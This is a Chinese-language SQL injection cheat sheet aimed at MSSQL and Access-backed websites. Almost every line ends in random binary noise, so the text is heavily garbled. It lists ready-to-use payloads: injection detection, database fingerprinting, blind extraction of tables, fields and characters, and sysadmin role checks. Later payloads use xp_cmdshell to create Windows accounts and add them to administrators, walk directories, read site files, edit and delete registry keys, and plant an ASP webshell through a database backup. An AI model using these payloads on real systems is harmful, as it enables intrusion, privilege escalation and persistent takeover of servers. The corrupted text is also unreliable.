1.判断是否有注入;and 1=1 ;and 1=2 1��zRO==�b
2.初步判断是否是mssql ;and user>0 7[�L�C*nrr
d�yd_dK/�
3.注入参数是字符'and [查询条件] and ''=' Gj=�il-Po�
h�%%'{�^>~
4.搜索时没过滤参数的'and [查询条件] and '%25'=' uy�pD`%�pC
o;fQ,r�P%�
5.判断数据库系统 ��q9Q4��F�
V QI7�lJV"
;and (select count(*) from sysobjects)>0 mssql T[~X~dqwn"
#��LiC��@>
;and (select count(*) from msysobjects)>0 access �,P^"X5$��
+Q.[W`go�V
�Gf�DA5v[
+\4�=G@P.J
6.猜数据库 ;and (select Count(*) from [数据库名])>0 e
6*=S�i}V
L6T_&�AiL$
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Ax
^�9J)C�
<�$E8�T>�U
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 @y�+�Wl�*:
0�!�Yi.'�+
9.(1)猜字段的ascii值(access) ���Oaui@q
7DD�ot_qb�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 4"{q|~&=:$
Vu�GSP]$�q
(2)猜字段的ascii值(mssql) 9E5B.qlw$l
AWw'pgTQX
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 "'%�x|�n�B
nP.d5%���E
10.测试权限结构(mssql) Ks4TBi&J �
?S"�xR0 *
m9�/a!|fBE
;k�>{I�8L~
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- �
�u!(|y9p
��.$�Y[>9�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- /)~M�cP3�
��-szvO_UP
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- �Z=�#!�FZ{
�m|!sY[�!
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- d97wiE/i<�
j�su�Q�R�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- xaPT�T�a��
h�<?Vz�l��
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Q9(
eH2��=
�U9Sp$$�L�
;and 1=(select IS_MEMBER('db_owner'));-- #VLTx�!�5o
o;t{Yf��K�
9vX�rC_W�9
��Xs4`bbap
11.添加mssql和系统的帐户 }RXm=A�rN
#��6JG#!W�
;exec master.dbo.sp_addlogin username;-- Q.x�3_+�CX
;exec master.dbo.sp_password null,username,password;-- X�WkYh�TaY
xSw ^v6!2�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- &TKB8vx=#�
%.]qkG�Ze#
;exec master.dbo.xp_cmdshell 'net user username password g1Aq;A�h�/
dD=�d�Pi#�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �S^��3I"�B
�By"
=]|Q�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- g��P`8hNwR
n�M@�S`"�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- ���0N�md*r
$c�c]pJy"}
QHK$2xtq�|
y:xZ(Rgf�F
12.(1)遍历目录 �l2xM�.v�R
*f1MgP*GKF
;create table dirs(paths varchar(100), id int) t�ip��\vS)
n<?:!f�`��
;insert dirs exec master.dbo.xp_dirtree 'c:\' <~�'\~Z�d+
�[�8<�)^k�
;and (select top 1 paths from dirs)>0 �iJU]|�t��
m�o��h7�:g
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 4�~D?F�'�o
c'[l%4U8[�
�I
U/g�YFT
]���"���^U
(2)遍历目录 0�m�!+gZ@
PC/�Oo~Gx
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- �woQY�P,�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 3s"�� R�v@
�[*@"[u� �
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 4;���x{@Ln
:2}zovsdj�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 �o@vo,J��U
bP(xMw<'�j
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 }Dm-I�bdg(
�Fc{hzqaP8
6Wl+5
a6V�
.cjSg�K1��
13.mssql中的存储过程 z.-��-"c�F
Ov�h[qm?Z�
xp_regenumvalues 注册表根键, 子键 )�bXiw3'A�
fQM:NI?�9?
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 ,..&�j�+m
a�?_N8|k[
xp_regread 根键,子键,键值名 }O-|���b#Q
�`J#(ffo-�
;exec xp_regread 7?xTJN�)G�
rUR{MF�&]D
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 xh,�};TS(K
>�T�=($:n�
xp_regwrite 根键,子键, 值名, 值类型, 值 4u0=/�pfi[
�gh���#�9<
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 Pd6��p)z�j
�W�L:CBE#
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 IOt����SAf
�'(r/@%�=U
xp_regdeletevalue 根键,子键,值名 q{ i9�V�J]
1TJ�2H�O=Y
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 L T�zD�\C'
[2:Q.�Z�j
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 B|zJrz�0q3
"8>�T�����
kZfa8w�L]P
E0[ec6^qwY
14.mssql的backup创建webshell q,(U���8��
�m��r&nB��
use model [�>� Q+=(l
gs7h`5�[es
create table cmd(str image); cxn3e�,d`�
Wxx�?�iW ,
insert into cmd(str) values (''); {�26�/�S�Y
Bvb.N�$G��
backup database model to disk='c:\l.asp'; E�<y0;l?H<
�9�ldv*9v�
O�`�<id+rx
��w�y�lbs@
15.mssql内置函数 qj/
pd
�7\
��rl"$6{Z}
;and (select @@version)>0 获得Windows的版本号 Z�CVwQ#Xe+
aNs�~Uad1U
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �ji9� (!�G
?�NkweT(��
;and (select user_name())>0 爆当前系统的连接用户 PT4W��ox9U
d�^�p� �af
;and (select db_name())>0 得到当前连接的数据库 Y">m g��=B
5n{J}�0C�
Oh)s"�f�\N
Ja��s=���D
16.简洁的webshell YW9r'{(D(I
�2^RW�GCEv
use model
0N�9`��WK
IsP-�[�0it
create table cmd(str image); � �qm�Q�}
M �uz+�j.0
insert into cmd(str) values (''); `��Tw�DR6&
R�I.6.f1dy
backup database model to disk='g:\wwwtest\l.asp';
